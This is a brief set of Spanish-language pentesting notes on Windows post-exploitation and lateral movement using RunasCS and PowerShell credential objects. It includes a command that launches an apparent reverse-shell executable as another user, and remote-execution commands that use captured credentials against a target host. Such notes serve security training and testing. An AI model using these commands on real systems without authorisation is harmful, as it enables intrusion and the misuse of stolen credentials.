Run As C# & Lateral Movement

• RunAsCS es una herramienta de post-explotación que permite ejecutar un programa como un usuario diferente en un sistema Windows. Esto es útil para obtener acceso a recursos restringidos o para ejecutar tareas con privilegios elevados.
• Si tenemos credenciales de un usuario dentro de una maquina pero no podemos acceder a ella, podemos usar RunAsCS para ejecutar un programa como ese usuario. Esto puede ser útil para obtener acceso a recursos restringidos o para ejecutar tareas con privilegios elevados.
• Repo
• Como utilizar
  • .\RunasCS.exe USER PASSWORD -l 2 "c:\Users\Public\reverse.exe"

Set up PSCredential

• $password = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
• $cred = New-Object System.Management.Automation.PSCredential("DOMAIN\USER", $password)
  • Luego de haber seteado las credenciales podemos usar el objeto $cred para ejecutar comandos con esas credenciales.
• Ejemplos:
  • Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}: Ejecuta un comando remoto en el equipo objetivo con las credenciales especificadas.
  • Enter-PSSession -ComputerName TARGET -Credential $cred: Inicia una sesión remota en el equipo objetivo con las credenciales especificadas.